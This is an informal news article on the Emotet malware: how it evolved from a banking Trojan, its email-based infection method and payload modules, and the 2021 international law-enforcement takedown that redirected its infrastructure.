An international effort by law enforcement agencies lead to the take of the notorious malware strain.
In 2014, Emotet (Also known as Heodo) was first detected. For the last 7 years it has been one of the most infamous pieces of malware infecting businesses and individuals a like.
At it’s Genesis in 2014, Emotet operated as a Trojan. Specifically engineered for banking, Emotet aimed to infect hosts and harvest banking credentials. It was seen initially in Germany’s banking sector, before the group behind the malware – Mealybug – began targeting Swiss bank customers also.
During the attacks, Emotet began to show signs of evolution; Mealybug had improved on their initial design. Emotet was now also capable of DDoS, malicious spam, and crucially, had a separate module for it’s loader.
This meant that before Emotet was deployed on a system, the attacker could load Emotet with any kind of malware desired.
Most notable of it’s cargo since have been the TrickyBot botnet and UmbreCrypt ransomware.
Emotet Infection Methodology
Like many attack vectors, Emotet’s attack vector begins via email. The email sent to the target either contained a link to a malicious document download, or had the document itself attached. Once downloaded, Emotet had two components – It’s primary component, and an anti-analysis module. Often the key to solving malware is by reverse engineering them, and Mealybug were aware of this. The anti-analysis module would fire first, doing multiple checks to detect if the host machine was a cybersecurity research machine.
Once Emotet has confirm the host machine is not, it will deploy the main component. This will run through Javascript or Powershell, and begin to download the Trojan, which will deliver a packed payload to the host machine. Emotet at this stage is able to move around the machines directories and obfuscate itself. It can download further malware from the attackers server, or relay any information. Crucially, it can download and implement updates not only for itself, but for what every other malware it’s brought onboard.
As stated, Emotet could download any malicious package and execute, however the most common were:
- Banking Module – A module which intercepts data from the network traffic to steal banking credentials from it’s host. This module was the initial and most commonly used, and so gave Emotet it’s reputation.
- Email Module – A module which could access the hosts email server and read information.
- Browser Module – A module which scanned the browser for data, including passwords.
- DDoS Module – This module caused the host to become a part of a botnet, used for DDoS attacks.
Worldwide Propagation
As Emotet grew more capable, it spread outside of Europe and across the world. In 2017, Mealybug began coordinating attacks using Emotet against targets in China, the UK, Canada, and Mexico. From mid-2018 onward, it’s primary and almost sole target has been banking customers in the United States.
In their report, the FBI stated that, “Emotet hit nearly every sector within the U.S.—paralyzing school systems, small and large businesses, non-profits, government services, and individuals… Emotet did not discriminate”
The cost of infection was high, costing local, state, tribal, and territorial governments up to $1 million per incident to remediate.
International Takedown
On the 27th of Janaury, the European Union Agency for Law Enforcement Cooperation (Europol) announced that ‘Operation Ladybird’ was successful – the name of the Operation which aimed to bring down Emotet and neuter it.
The method of the takedown was unique to say the least.
Ukrainian polices forces raided Emotet operators, and seized their systems.
With the systems retrieved, Europol dug through Emotet’s hierarchal infrastructure. All redirects sent to servers controlled by Mealybug were instead sent to servers controlled by law enforcement agencies.
There are 45,000 infected hosts in the US, and many more worldwide – These now have a harmless version of Emotet, which only communicates with government servers.